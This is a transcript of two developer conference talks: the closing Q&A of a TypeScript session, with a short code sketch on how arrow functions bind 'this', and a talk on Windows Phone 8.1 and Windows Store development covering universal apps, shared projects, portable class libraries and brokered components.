Once I do all this, I can go to localhost and run the application, and voilà: I have my photo gallery application using end-to-end TypeScript, meaning I'm using it on the server in Node.js and with a few libraries on the client side — Galleria and jQuery — all together in a typed way that helps me avoid a lot of pitfalls like those we saw at the beginning of the session, and more. And this is the greatness of TypeScript: it helps you write more maintainable and scalable code. With that, let's go to questions. Yes — what about unit testing? Okay, TypeScript doesn't include unit testing, but you can use any JavaScript library for it. For example, tomorrow I'm going to talk about Jasmine, a BDD library for unit testing in JavaScript. You can use that, and Jasmine has a declaration file, so you can use Jasmine from TypeScript. I know it's very important, and you can use a lot of the libraries out there — QUnit, et cetera — with TypeScript, but it's not part of the language. Any other questions? Yes — what about debugging? Okay. What I didn't explain here is that, as you can see, once I'm writing something in TypeScript, I'm generating app.js.map — I'm using source maps to map back to my TypeScript. So developer tools like the IE developer tools or Chrome DevTools can use those source maps to help you debug TypeScript files. On the client side you have JavaScript — you are downloading JavaScript — but you can debug TypeScript using the IDEs or using source maps, like any other language. Yes — do they support it? Yes: Chrome DevTools use source maps, IE from version nine or ten uses source maps, and of course Firebug in Firefox, if you want to use TypeScript with Firefox as well. In Visual Studio it's built in, so you can debug anything in TypeScript inside Visual Studio.
Any other questions? Yes. You're asking whether, like Script#, you get a minified version of the compiled code. Right here you don't see a minified version, but you can use tsc with a switch to create a minified version of your code. It was part of Web Essentials, Mads Kristensen's Visual Studio plugin, and you can enable it through configuration inside Visual Studio. In WebStorm, you just need to configure a file watcher, and once you save the file, it will also generate a minified version of your code. Okay. Yes — what's the future of TypeScript? Okay. TypeScript is currently in version one. As I see it, once ECMAScript 6 is out there, you get all the things that TypeScript includes, but TypeScript has a lot of other things that ECMAScript 6 doesn't include — for example, generics, enums, and more. I don't know what the future of TypeScript is; like any other language, it depends on the company behind it. We all know that Microsoft kills some languages or features that we are used to or used in the past. I can't speak for Microsoft — I'm an MVP, I'm not working for Microsoft, and I'm not on the TypeScript team — but hopefully it will stay here at least as long as we don't have ECMAScript 6 out there. Okay, so it sounds like when ECMAScript 6 is there, TypeScript is no longer needed? I don't think so. ECMAScript 6 has a lot of issues. It's coming from the community, and in the specification work there is bashing — I mean, Apple, Microsoft, and Google bashing one another in order to drive the features they want into ECMAScript 6. I don't know when it will come out. It was supposed to come out in 2014; it's not out. What are the alternatives to TypeScript? As you saw on a previous slide, you can use Dart from Google, but you have to learn the Dart language.
You can use CoffeeScript from Jeremy Ashkenas, but you need to learn the CoffeeScript dialect. You can use Script#, Nikhil Kothari's project, which lets you write code in C# and compile it into JavaScript. You can use ClojureScript, and there are other alternatives to TypeScript — but none of them starts from JavaScript itself when compiling into JavaScript. You'll have to learn another language in order to use them. Yes — a question about this. Yes, this is the actual this; it's going to preserve your scope. When you use a lambda, the compiler will create a closure around a captured variable holding the outer this. It is part of the language: this in TypeScript is really this, like we are used to in object-oriented programming. It's not something you need to be afraid of. The this-and-that patterns and not understanding scoping in JavaScript can harm you — these are some of the major pitfalls in JavaScript. Here, whether it's in a lambda or in the regular code you write, this is really this. Does that answer the question? It doesn't quite match your personal experience? If you wrote code where the lambda was nested inside another lambda, or something like that, then in TypeScript 0.8 and 0.9 it wouldn't compile correctly. I think they fixed it in version one, but I'm not sure, so I can't answer that without checking. Any other questions? A last question: if you had to find something negative about TypeScript, what would it be? For me, in my experience, it was — in the minor versions, not version one — a lot of memory leaks. TypeScript in versions 0.7, 0.8, and 0.9 had memory leaks that you would see — hopefully not in version one anymore — once you reached more than, I think, 500,000 lines of TypeScript code.
On a very large enterprise application that included, I think, 700,000 lines of TypeScript, we got memory leaks that crashed the whole of Windows. That's one thing. The other thing is that there are features included in TypeScript which I think aren't necessary at all. For example, I don't like generics in TypeScript; it doesn't feel right to me, because I come from a JavaScript background and it's nonsense for JavaScript. But this is my own opinion, not something everybody thinks. If you have any other questions, come to me after I wrap up this session. So, to wrap up: TypeScript is open source — you can go to CodePlex and take a look at its code. It's currently in version one. It's out there, and you have been able to use it for, I think, almost two years. It has a lot of features which are very much missing from JavaScript, whether it's modules, encapsulation, classes, interfaces — a lot of good stuff that we really hope JavaScript will get in the end. Right now, it's not there. You can use TypeScript today and write your ECMAScript 6 of tomorrow. Here is the slide with all the references and resources; you can download the slide deck. You can go to typescriptlang.org to learn more about TypeScript, and there's the DefinitelyTyped link as well. If you want to follow me on Twitter, it's @gilfink, and there's a link to my website. Let's wrap up: use TypeScript, because it brings ECMAScript 6 today. That is the main thing about TypeScript — use it because of that. Thank you. If anybody has questions, come — I'm here, and you can come and talk with me.
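As a postscript to the Q&A point about this and lambdas, a small sketch (names are illustrative): an arrow function captures the enclosing this — the compiler closes over it in a helper variable in the emitted JavaScript — while a plain function's this depends entirely on how it is called.

```typescript
// Invokes a callback with no receiver, like an event system or timer would.
function invoke(fn: () => string | undefined): string | undefined {
  return fn();
}

class Counter {
  constructor(public name: string) {}

  arrowStyle(): string | undefined {
    // Arrow function: `this` is captured from the method, so it is
    // really this Counter instance — like in other OO languages.
    return invoke(() => this.name);
  }

  functionStyle(): string | undefined {
    // Plain function: `this` depends on the call site, and invoke()
    // supplies no receiver, so the instance is lost.
    const fn = function (this: any): string | undefined {
      return this ? this.name : undefined;
    };
    return invoke(fn);
  }
}

const c = new Counter("clicks");
console.log(c.arrowStyle()); // "clicks"
console.log(c.functionStyle()); // the receiver is lost here
```

This is exactly the pitfall the speaker mentions: the arrow syntax makes this behave the way object-oriented developers expect.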
Creating cross-platform, application-scale JavaScript code that runs in any browser or in any host is very hard. TypeScript is a programming language that changes that situation. In this session, you will get to know the TypeScript language. You will also see how to build an end-to-end web app using the language.
10.5446/50546 (DOI)
this small laptop and this little space here. Thank you for coming. I'm happy to see that so many people are interested in Windows Store and Windows Phone. I was trying to come up with a really good title for this session, but I'm not a big fan of sexy titles — the "why you completely suck if you don't watch my session" type of titles — so I just went with something somewhat boring, "What's New in Windows Store and Windows Phone", because I can't possibly cram into the title everything we're going to cover today. I changed my abstract, so I'm not sure how many of you have read the new abstract with a little more information. I submitted the abstract before Build, and I was under NDA, so I couldn't share exactly what I was going to talk about, because a lot of it wasn't official yet. Now it is, so the abstract has been updated. We are going to talk about what's new in Windows Store and Windows Phone, but also what is new surrounding those two technologies — so we're not going to cover just that. I will not focus a lot on APIs and API changes. I will walk through some of them, but the demonstrations are mostly centered around architecture, Windows Runtime components, class libraries, universal apps, and so on, because I think that's where you gain the most from actually watching a session. With APIs, you have the information online, you have the documentation, and you look it up when you need it. So I wouldn't call this an architectural session, but there's a fair bit of that. My name is Iris Classon. I'm a C# MVP, among other titles. I'm a software developer for a company called IdentityMine in the US — I live in Sweden, though. I'm also a Pluralsight author, and because of the density of this session, if we don't have time for questions at the end, come up afterwards; you can also grab a free one-month pass for Pluralsight if you want to try the courses there. And I'm also an O'Reilly author.
And I have with me two books, and the first two people to come up here and ask questions afterwards will get a copy if they want to. It's for Windows Store, but — hooray — now it applies to Windows Phone too, and I might have a chance of actually making some money off the book. Not really, though. Okay. You usually have one picture of yourself on the slide — I don't know why, because you're usually there in person — but anyway, I have a lot of pictures. They updated the picture next to the abstract, I think it was yesterday. I change my hair color a lot, so you might have seen me with something like this, and I don't know what my hair is going to look like tomorrow. Let's talk about what we are going to cover in this session. I tried to group things together a little, but we're going to cover things that are related yet still differ a fair bit, so I'm going to try not to jump around too much, but I will need your full attention. I'm going to talk about convergence and sharing. I'm also going to talk about what's new in Windows Phone; we're going to talk about Silverlight, Windows Runtime, and doing applications with JavaScript and HTML. I'm going to talk about universal applications — I will not spend a whole lot of time on them, because they are so simple that they don't need it. We're going to talk about what's new in portable class libraries. There are actually a few things that I didn't see in a single session at Build; somehow it went completely unnoticed that portable class libraries have had quite a few changes, and I think that's a shame, because the team at Microsoft has done a fantastic job with the libraries.
I'm going to talk about components, Windows Runtime components that is with the most focus being on the new brokered components, which are components that allows us to use legacy DLLs in a Windows Store application, which is really neat because finally we can actually have some decent line of business applications reusing DLLs. I'm going to talk about side loading and also deployment, the store, the dev portal, and changes there because there's been a fair bit. And throughout the session, I'm going to recommend a couple of Visual Studio extensions that are good to have and a little bit nice, neat tricks. And at the end, I'm going to show you where you can go find a lot of samples for in particular universal applications. And that's where you're going to find all the examples of how to use the new APIs and so on. Let's talk about Windows Phone 8.1 Silverlight. So Windows Phone now exists in many forms and the Silverlight is still there and is not dead. TDD is not dead, Silverlight is not dead, it's still alive and somewhat thriving in the dark corners in the forest. We now have Cortana, which, Cortana, have anybody here tried Cortana? Yeah? I live in Gothenburg, so asking for weather always gives me Gotham, which is interesting. If I had Sweden at the end, she would actually tell me the weather. What's really neat about Cortana now, you still use the speech APIs exactly like you've done before, but it leverages more of a natural language so you don't have to use grammar files for the tiniest, tiniest little things. And that's why it makes a big improvement for us as developers if you have applications that use speech. And I dare to say that so far we have this best speech recognition and text to speech among the mobile platforms and I'm kind of hoping to see more improvements there as well. We now have a lot of triggers and conditions in Windows Phone and one of them is, one of them is Geofencing. 
Geofencing basically lets you set locations and trigger an action based on a location. We have roaming data between Windows Store and Windows Phone, which is quite neat. This is something I've used a lot with Windows Store, and I'm very happy we have it on Windows Phone as well: it gives the user more of a feeling that it's the same application, although it's two different applications. We also have start screen backup and app data backup on OneDrive, and this does not come out of the user's OneDrive quota — it's not a lot that it takes anyway. We have many new tile templates, but most importantly we have a custom tile helper class which lets us create tiles any way we want to. They're really pushing tiles forward. Applications never close on back — that's quite important to know — and it's also important to know that when you launch an application from a tile now, it doesn't start a new instance of the application; it brings back the same application that was there before. We have the action center, and the action center has significance for us as developers because that's where our notifications can live, which brings me to the fact that we now have a common notification service: you only need to create one channel to target both Windows Store and Windows Phone. And memory management has been improved and is now dynamic. So, very densely, this is what's new in Silverlight. Although there's been a lot of convergence and a lot of talk about how we now have everything on both platforms, there are a few things that we only have in Silverlight and don't have in WinRT.
So what we have in Silverlight for Windows Phone — which you might take into consideration if you're starting a new project today — is lens app support, the clipboard APIs, the camera capture task, the ringtone provider, search extras, the lock screen wallpaper API, and a few more. There's a list on MSDN; take a look there, because if you have an application that relies on one of these, you might want to hold off on updating the application. The biggest change, for me at least personally, hasn't been all of this, because having new additions and new APIs is something I kind of expect. This, however, is the really big news for me: all the options that we have. It's a little bit overwhelming. If you were to open this today, the first time you're doing a Windows Phone application, and you saw all these options, it would be really hard to pick something. This reminds me of when you want to start a new web application and you have all those options. I'm kind of expecting to see just one Store option at the top, and then you download templates for what you need. So we have a lot of options to choose between. I'm going to show you in Visual Studio. Here, let me tab out — let's see if it works. For some reason, the computer keeps jumping out of duplicate mode every time I end the slideshow. I'm not going to do the whole File > New Project; I assume everybody knows how to do that. I want to show you three examples here — I hope you can see them on the right-hand side. The first is a Windows Phone application; you can still develop for all the Windows Phone platforms. If you're targeting Windows Phone 8, it's going to look like before. If you target Windows Phone 8.1, there is one difference you will notice: we now have a Package.appxmanifest there. We still also have the old manifest file, which you see here, but we have this in addition.
So the one at the top is Windows Phone Silverlight, the one in the middle is Windows Phone Silverlight 8.1, and the one at the bottom is Windows Phone WinRT 8.1. As you can see, the last one only has an appx manifest. You can see a transition: at this point you have both, and then in the WinRT version you only have the appx manifest. That's where they're heading with Windows Phone as well. While we still have support for Silverlight, it's quite clear that it's just buying us time. At some point there will be no further support for Windows Phone Silverlight, so you might want to get used to the thought that you'll have to transition over to the new XAML stack, the common XAML UI. So these were some of the options. I'm going to get back to some of the other Windows Phone project types, but I just wanted to show those first. Let me go back to the slides — it keeps jumping out of presentation mode, sorry; this is something that came with the update and it is literally driving me insane. All right. One other thing that we have in Windows Phone now is that we can finally create HTML and JavaScript applications on the phone using language projections, which means you have full access to the same APIs as if you were writing it in C#. Now, this is not the same thing as the previous HTML template, which was Silverlight-based and basically just a browser control. I personally never even used that, because if I wanted that, I would just go ahead and use PhoneGap, for example — which I really don't want to use. What's really neat about the HTML and JavaScript applications is that we can leverage third-party libraries, and I wanted to try this. I'm not much of a JavaScript developer, but I had the pleasure of attending Mr. Scott Allen's workshop on AngularJS earlier this week.
We were given a choice between ASP.NET MVC or Node to go through the labs, and I decided on doing Windows Phone instead to see how that would work. Now, since this is a mobile phone, there are naturally going to be some differences, and that also means you have to do a little bit of tweaking. I had to make some changes to Angular to make it work, but not as many as I thought I would need to. I'm going to show you what it looks like. And I'll have to keep doing this all the time — does anybody know why it does that? I've tried it on three different computers, and it keeps jumping out of presentation mode. Let me go to the application here and close this. Yeah — it's when I alt-tab that it goes out. It is what it is. I don't have a lot of slides, thankfully, so I have a lot of code to walk through, and actually I'm going to close this down, because I don't want you to be distracted by it. Okay. Back in Solution Explorer, there's this project called Not the Same. This is the old HTML template, and it is basically a Silverlight application with a browser control. Now we have what I guess we can call native HTML and JavaScript, and here is the application. Let's see if I can make it run. Hmm. Okay — let's see if that's the right emulator. My emulator image got corrupted in the update I did last night, so I would probably hold off on that update. But the application should work. So this is the application, the result of the lab. It's not anything fancy, but it does prove that you actually can use Angular. A very simple application: you see all the different movies, and you can increase or decrease the rating. You can edit; there's validation, sorting, filtering, searching, and so on. To be able to make this work, I added AngularJS, and I had to do some patching, because in WinJS you're not allowed to load dynamic content.
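A sketch of what that kind of patch looks like. In a WinJS app, code that injects dynamic HTML must be wrapped in MSApp.execUnsafeLocalFunction, so you route the library's DOM writes through it. MSApp only exists inside a Windows app, so it is simulated below, and the patch shape is an assumption based on the talk — not the actual Angular internals.

```typescript
interface MSAppLike {
  execUnsafeLocalFunction<T>(fn: () => T): T;
}

// Simulated MSApp — the real one is provided by the WinJS host, where
// the wrapped function is allowed to write otherwise-blocked content.
const MSApp: MSAppLike = {
  execUnsafeLocalFunction<T>(fn: () => T): T {
    return fn();
  },
};

// A stand-in for a library function that writes dynamic content; in a
// WinJS app, the unwrapped innerHTML assignment would throw.
function setInnerHtml(element: { innerHTML: string }, html: string): void {
  MSApp.execUnsafeLocalFunction(() => {
    element.innerHTML = html;
  });
}

const el = { innerHTML: "" };
setInnerHtml(el, "<b>hello</b>");
console.log(el.innerHTML); // "<b>hello</b>"
```

The speaker's caveat applies here too: patching a third-party library this way is fragile, because the patch has to be reapplied on every library update.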
I'll show you quickly what I had to change, here in the shared project. Yep. So this is a function you have in JavaScript — let me scroll in here — execUnsafeLocalFunction. When it complains about loading dynamic data, you have to wrap the call in this function. I'm not sure I would do this in a production application — patching up Angular — because you might forget to patch a new update, and there are other ways to go about it as well. But I just wanted to show you that you can use any third-party library you want; just be aware that this is not a web application, so you will need to add some modifications. It does make it easier if you want to reuse something you already have. And as you might have already noticed, I'm actually in a shared project, which I'm going to talk about really soon, which is related to universal applications. What I have here, I could literally share across to a Windows Store application — which brings me back to the slides, and let's see if it jumps out again. Yeah, sure. Just a moment here. Yeah, slideshow. I'll set it to the primary monitor; I wonder if that's going to help. Well, we'll see. Thank you, Scott — is that what I get for promoting your workshops? Universal applications: it's just a new solution template that really simplifies the way we can share code. Think linked files — if you've used linked files, that's what we're doing. Apps can share code, and they can share views. In regards to views, we use the common XAML UI. Windows Phone now has a project type which uses the Windows Runtime and also uses the new XAML stack. Of the controls, 80% are in common and 20% are adapted, which means they have slightly different behavior and a slightly different look, but they still use the same underlying APIs.
And the reason there were always going to be some differences is that the user expects different things, because there's a big difference between a tablet and a phone — maybe not so much this phone, because it's quite big — but there are different user expectations depending on the device. I'm going to show you an example; let's see if this works. It might actually be working. I'm going to go out of the universal application and show you instead. As I said, I'm going to skip File > New Project — just File > Add New Project — and then under Store Apps you will find universal applications. Let's have a look. When you create a new universal application, you get three projects: a Windows Store project, a Windows Phone project, and a shared project. In time we will have Xbox as well, but it's not quite available to us yet. The shared project — I guess you can call it a virtual folder — is where you have everything that is being shared. As you can see, I am sharing both the Store page and also the main page of the application, which you can do, but I think you're going to find yourself having problems getting a layout that scales just as well to this size of screen, to this size of screen, and to an even tinier screen. Usually you're not going to end up sharing whole pages; you're going to end up sharing user controls. Let me open this and show it to you. I also want to point out that you can see in the references here that the shared project is referenced from both the Windows Phone and the Windows Store projects, but that's not so important right now. I have a very simple application — it just says hello world. We can stick with hello world for now, because we just want to see the interaction between the different components. It's just a very, very simple text block there, and then I pass in "hello world". I'm going to show you something in two seconds: how you can share code in different ways.
This is how you can do it in a universal application. I have my code file, and as you can see, I'm using conditional compilation. If you don't know what that is, it's basically just telling the compiler what to compile based on a symbol — and this is a symbol, and this is a symbol. If you wonder where they are: just right-click on a project, go to Properties, go to Build, and there you have the conditional compilation symbols — you can see them here. As long as you use a semicolon to separate them, you can add your own. I would, however, prefer to stick to the existing ones, so another developer looking at your code knows what on earth you're doing. Now, conditional compilation, although it's really, really ugly, does work quite neatly, and as you can see, we have really good IntelliSense support. With my beautiful syntax highlighting — I love the colors, yes I do — it only highlights the platform we're currently working with, which brings me on to talking about the authoring tools, which we'll do very, very soon. But this is how we can choose to output different things depending on which platform we're compiling for. It's a simple example, but it does scale pretty well. Let's go back — and this is it with universal applications. I'm going to show you a little bit about how you manage the views. In short, with the common XAML UI, I talked about the controls that are in common and the ones that are optimized, referred to as primitives or tailored/optimized. The controls that are optimized are the ListView, the flyout, the media player, and the app bar / command bar. Now, authoring improvements in Visual Studio: when you are targeting two platforms that are as different as these are, you've got to manage the design as well. And although I don't really like working a lot with design, I've found that as long as I'm doing XAML development, I always end up doing full-stack development — very rarely have I actually had a designer available to me.
We have much better tooling support than we've had before, and I can illustrate that by going to the main page here and showing you this. It's a little bit hard to see — I don't have ZoomIt installed right now — but you have a drop-down menu where you can select Windows Phone or the Windows Store application, or whatever other platforms you have targeted, and it will switch between them. It works 90% of the time for me; sometimes it lags a little. But you can easily switch here, and when I do that, as you can see, it switches here in the designer as well. The device window has also been polished a little. To find the device window, it's easiest to hit Ctrl+Q, which brings up the Quick Launch menu at the top; start typing "device" and you'll see it as an option. The device window lets us see, without actually running the application, how it's going to look with different scaling, different contrast, different themes, and so on. As long as you use the navigation menu and switch between Windows Phone and Windows Store, you can do a lot of editing without having to run the application, which we know takes a lot of time. We also have other navigation menus here to find things. Talking about that, I wanted to mention a little thing, because I've gotten this question a few times: how do you format XAML? Because you're going to end up with a lot of XAML now. If you want to format XAML, there's actually an option you can set to auto-format XAML, and we've had that for about four years, I believe — it's just well hidden. Go into Options, and under XAML, choose "position each attribute on a separate line", and you'll be set. Okay. Let's talk about how we manage differences in the view, because in code you can use conditional compilation, which I showed you here. But what do we actually do with the view? Well, there are a few ways we can go about it.
I'd like to show you something here. Be aware that what I'm showing you here hasn't been tested a lot. It's still in beta. So if you use it, use it with care. The same developer that made XAML Spy, which I'm going to demonstrate, has also made a nice little NuGet package which allows us to do conditional compilation in XAML, which is quite neat. So the way it works, after you add it (it's called XAML conditional compilation, XCC), you define the symbols at the top, pretty much kind of as we do in C sharp. And then you just wrap the elements that you want to use using them. There were a few bugs which I notified him about, I think, two days ago, and he fixed them within 20 minutes. So he seems very keen on keeping this project up to date. And it's definitely worth a try, but I'd be very careful bringing this into a production application without having some decent testing and making sure that it won't break. That is one way you can go about it, if you want to have everything in there. Now, what you can also do, if you have the exact same user control: as you can see here, I have a child user control, which is this one here, and if I switch to Windows Phone, let's give it some time to load, it should bring up the Windows Phone one, which is a different color. As long as you use the control in XAML and it exists in both the projects (and it will let you know if it doesn't exist in both projects), we get really good help here from Visual Studio. It will bring in the right one. So it's very easy to actually handle the user controls. And I think a modular architecture of the application is something that is easier to manage than actually managing whole pages at a time, because you can share user controls more than you can share pages, because of just the scaling, basically. And XAML Spy, I'll show you XAML Spy here. Let's see. I'll just run the emulator. See if I... I can't run XAML Spy on the JavaScript application yet.
He might add support for that later. I'll use... This is just a hub application. I haven't made this one. All right. Let's see. Select Visual. So this is XAML Spy. What it allows you to do is basically debug XAML at runtime. And it's helped me a lot, in particular when I've been working with animations. And I just find working with animations a tremendous pain. If you purchase a license for it, you can actually run just a XAP package if you want to. Otherwise, you can run it from Visual Studio like I did now in the emulator. And it'll bring up a window here and you can go and take a look at all the different properties that you have for an element. For some reason, they're not all showing up here, are they? Let's see. Hmm. That's interesting. Well, it seems to actually have problems loading the XAML stack. So how's that for debugging? That is XAML Spy. And this is not a session about XAML Spy, and it's definitely not a new addition here for Windows Phone. Portable class libraries. So we've been talking a little bit about sharing logic. And I do find that in particular, portable class libraries kind of go very much unnoticed. And I'm not quite sure why. Not everybody likes them. I really like them. If you don't know what portable class libraries are, it's just a magical type of library that creates one binary which is then shared, which also means that we can't use conditional compilation and we need to abstract away the platform differences, which some people, like me, prefer over conditional compilation. There have been great improvements, now that we can actually share views, assets and resources in a portable class library. And there are also more and more third party open source projects that support portable class libraries, and there's a NuGet package for pretty much everything. It works really well together with universal applications and the shared project that universal applications use. But to be able to use that, we need to have an extension.
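As an aside on that last point, abstracting platform differences away in a portable class library usually means defining an interface in the PCL and injecting a platform-specific implementation from each app project. A rough sketch of the idea; all the names here are invented for illustration:

```csharp
using System.Threading.Tasks;

// In the portable class library: only the abstraction lives here.
public interface IPhotoService
{
    Task<byte[]> TakePhotoAsync();
}

public class ProfileViewModel
{
    private readonly IPhotoService _photos;

    // Constructor injection: each app project hands in its own implementation.
    public ProfileViewModel(IPhotoService photos)
    {
        _photos = photos;
    }

    public Task<byte[]> UpdateProfilePictureAsync()
    {
        return _photos.TakePhotoAsync();
    }
}

// In the Windows Phone project (and similarly in the Store project):
// public sealed class PhonePhotoService : IPhotoService { ... }
```

A service locator with adapters, as mentioned earlier, is a variation on the same theme: the PCL only ever sees the interface.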
I'm just going to pin this back. Oops, that was the wrong one. This is the extension you want to have: if you want to use the shared project in any other way than doing the create new universal application, you will need to add this Visual Studio extension. I think it was released a few days after Build, but I did mention it at Build. The shared project reference manager. At the end of this session, I have a slide with screenshots of the Visual Studio extensions and tools I'm talking about, if you want to kind of grab a photo as a reminder for later. This also allows us to use the shared project together with a WPF application, a universal application, Windows Forms, Web Forms, whatever you want to use it for. However, of course, you're not going to be able to share the WinRT XAML stack with anything else than the actual applications that support that particular XAML stack. But make sure that you download this one. Otherwise, you're going to bang your head against the wall trying to add other project types. I assume that with time it will be included in a Visual Studio update. I hope so. Let's talk about the portable class libraries. And as we do that, I'd like to talk generally about how we've been sharing code before we had universal applications. Because we've been able to share code for a long time, and many people are under the impression that this is something new and it's super cool. And of course, it is cool that we have universal applications, but it's just an extension of something we've already been doing for a long time, and it's important that people understand that. So there are a few ways you can share code. I mean, if you want to be really cheeky and maybe not super smart, you can go ahead and just copy a file, you know, over to the other project. It's not really sharing. It's kind of inspiration by copying.
But a lot of things can go wrong there when you copy and paste, so it's not something we usually recommend. The next step from that would be to create a file somewhere in the solution in the project or wherever. And then you add it as a link to the project, which you do by right clicking add existing item, you select item, I just add something random here. And in the drop down menu, you select Add as link instead of add. This will in the project file link in the files, it's going to seem like it's physically there. And it has a tiny, tiny blue icon that indicates to us that this file is being linked in. This is what universal applications also do, but it's not visualized the same way. After linked files, we got portable class libraries and we had a lot of problems with portable class libraries in the beginning because there was a lot lacking. Portable class libraries can be used to target many, many different platforms. WPF, console applications, whatever you want to target. But it's going to limit access to APIs to the least common denominator. So if you're targeting, for example, Xbox today, you're going to be very limited in what is accessible to you. That is kind of the downside of portable class libraries. You have to handle platform differences without conditional compilation, which is, you know, you use, for example, a constructor injection, use a service locator, you just use some sort of nice little pattern to manage it. So I probably wouldn't do exactly that. I use service locator with adapters, but that's a different story. Now we can actually share XAML as well. And the only reason that we can share XAML now is because we now have the same XAML stack available to us, both Windows Store and Windows Phone, and soon Xbox as well. So I'm going to show, run this example here. I'm just going to set the startup project here. Let's see those two. So I can run both at the same time. Just as a proof of concept. Right. 
So as you can see, hello from Windows Phone, hello from Windows Store, and there's a button that takes me to a yellow page. And this page is in the portable class library, and I can go back. It works. So that was one option. So we have the portable class libraries. A third way that we can share code today is by using Windows runtime components. Now Windows runtime components we've had for a while as well; as long as we've had Windows runtime, we've had the components as well. They're very limiting, and there are many things you can and cannot do with the runtime components. There's a course on Pluralsight about that if you're more interested in it. So this would be my least favorite option out of the sharing options. What's really nice about the Windows runtime components is that they're cross language. It's Windows runtime, it leverages metadata, so you can write it in any language that a component can be written in, and you can call it from any language that can call it. For example, a JavaScript phone application, which I have here. And I'm not going to run it, but I'm just going to show it here to you. So you create a Windows runtime component, you create whatever method, class or whatever you want to, and then inside the JavaScript application, after we add a reference to the component, you just call it. And it will go ahead and lowercase the methods for you, so you don't need to change your naming convention. So if you write in C sharp, you just write it as you usually would, and you would probably not lowercase a method name. And trust me, it works. I don't want to run it in the emulator now. I'll show you another example where I actually do that. So these are the runtime components, which brings me to the brokered components. They also introduced brokered components at Build, which was really exciting to me, because this has kind of been a little bit of a deal breaker with Windows Store applications, that you can't use legacy DLLs.
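To make that cross-language point concrete before moving on: a C# Windows Runtime component exposes sealed classes with WinRT-compatible signatures, and the JavaScript projection camel-cases the member names for you, exactly as described above. A rough sketch with invented names:

```csharp
// C# Windows Runtime component: public types must be sealed
// and use WinRT-compatible signatures.
namespace MyComponents
{
    public sealed class Greeter
    {
        public string SayHello(string name)
        {
            return "Hello, " + name;
        }
    }
}

// From the JavaScript app, after adding a reference to the component,
// the projection lowercases the first letter of the member name:
//
//   var greeter = new MyComponents.Greeter();
//   var message = greeter.sayHello("NDC");  // note sayHello, not SayHello
```

So each side keeps its own naming convention, and the metadata-based projection bridges the two.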
And the thing is, what do you do if you actually want to call some native DLLs and you want to have them accessible to you in a Windows Store application? What you can do now is you can create a Windows runtime component that uses a proxy, which allows you to call legacy DLLs or other DLLs. And as long as you provide a wrapper for a native DLL inside the Windows runtime component, you can actually use it. Which means that a lot of companies can actually leverage existing DLLs. I'll show you a quick example here. So here's an example of a brokered component that I put together. As you can see, I'm calling some native Windows DLLs. And here is the proxy. It's written in C++. I didn't write it. I'd rather not try to. There's a nice kind of step-by-step guide on MSDN, which I hope they've updated, because if you follow the steps, it's not going to work. So it took a lot of messing around to actually manage to get this to work. And it's a little bit tedious to make it work, but it might be really, really important for business applications. There is a Visual Studio extension for brokered components, which gives you some templating. But I believe you still need to generate the proxy yourself by adding a post-build event. The broker here basically just lets us dig into these DLLs and call them. And in the Windows Store application, you need to add an extension here to allow the call to the brokered component, as you can see I've added here. Now, you have to sideload an application that does this. Because of the sandboxing model of Windows Store applications, they weren't too keen on giving us the option of doing this with WinRT components. But now we can, but it means that the application has to be sideloaded. But it gives us all the possibilities in the world. We can actually do whatever we want to do now, as long as the application is sideloaded. And the sideloading of Windows Store applications has been a little bit simplified.
It's much cheaper now in terms of the licensing and so on. So there have been a lot of improvements there, and I believe they're still improving on the sideloading process of Windows Store applications. Let me run this application. This just sets the cursor position and plays a sound. You probably won't hear the sound. See if you can see the cursor move. So it moved to the left there. It's just a proof of concept. Wouldn't exactly call this a line of business application, but yeah. So with all those options that we have available to us, and the brokered components are just for Windows Store applications, with all those options available to us, the natural question is, what do I choose? And you can see here that the linked files and the shared project are really similar, because basically it's more or less the same thing. I would tend to use the shared project in universal applications in most scenarios, together with the portable class library if I aim to target other platforms such as iOS and Android. Portable class libraries work really well with Xamarin, and you can target iOS and Android as well. And my manager, Laurent Bugnion, has an MVVM framework, MVVM Light, that now works really well with Xamarin as well. Now the WinRT component, as you can see, is quite, quite limiting. So think it through before you decide on actually using that one. Let's talk about deployment, because I started talking a little bit about deployment, but I want to talk a little bit more about that. Packaging has also changed for applications. Now there are three different package types for 8.1: you have the XAP packages, you have the APPX, and you have the APPX bundle. In regards to resolutions and resources, just chuck it all in there, because only what the user needs on their device is going to be downloaded, that's fine. Applications can now be installed on SD cards, woohoo, but users can opt out; it's not something that we can decide.
If we are however worried that the user is going to go ahead and share our application, they're not going to be able to do that, because it's encrypted with a device specific key. And the question often comes up: can you add lower version support later on? Yes, indeed you can. Those are all the changes to packaging. There are also a lot of changes to the store and also to the developer portal. They have this grand vision of having one store, which I think we're all looking forward to, with one landing page, one registration and so on. I'm not quite sure when that's going to happen, but that is the aim. And that also means that we have a lot of changes in the Dev Center as well. Today, when you want to publish a universal application, you have to link the two together, so you need to reserve a name for both of the applications. That's quite important to know. You still upload the packages separately. It's still kind of two separate processes today to publish. In the Dev Center, you can now actually cancel submissions. There is much faster publishing; I hear of people who get applications published within a day, which is really nice. There's better reporting. In the Windows Dev Center, you can unpublish applications. You've been able to do that for a while, it's not really that new, because I know I've done it a few times. I join a hackathon, I whip out some apps to win something, then I remove it from the store later, because I'm embarrassed. And you can set the publication date and time, but it doesn't mean that the publication is going to happen any faster. It's not like they're going to see the time and date and go, oh my God, this person is in a hurry, let's get this out. That's not going to happen. I realized that there was one thing I didn't show you. When I showed you the JavaScript application that I wrote with Angular, we were also using the Windows runtime component.
And when you use a Windows runtime component, it's all packaged together. I had this question the other day, how that works. It's all packaged together. But you can make a Windows runtime component portable. I've never done that myself, but you can if you want to. So these are some of the extensions and tools that I showed you. These are the three I would get. This one is an alternative; it actually worked quite well for me up until today, so I'm not quite sure what happened there. But make sure that you grab the brokered WinRT component project template, because you are going to need that if you want to do brokered components, because you don't want to write them from scratch. You're also going to need to keep an eye on the documentation for the brokered component. The shared project reference manager allows you to use the shared project freely, without the restriction of having to create a new universal application to get the shared project. And to add a reference to a shared project, let's do that. Give me a Portable Class Library here. Let's see. Oh, this menu is so big, it's just driving me crazy. Let's see. Add... There. Without the Visual Studio extension, you're not going to see this option there, where you add the shared project. So you're not going to find it under Add Reference, where you'd normally find things in the list. It's going to be under the Add menu: Add Shared Project Reference. Conditional compilation in XAML, it's still at kind of an experimental stage, but it works. I'm not sure how bad the breaking can be. The problem I found with it was that it was having merge problems with the XAML that was generated, which can actually be quite a serious problem. So be a little bit careful with it, but it's definitely a very interesting concept. But otherwise, just use different user controls. I mean, it's a little bit more work, but we can still do it. Now, one more thing.
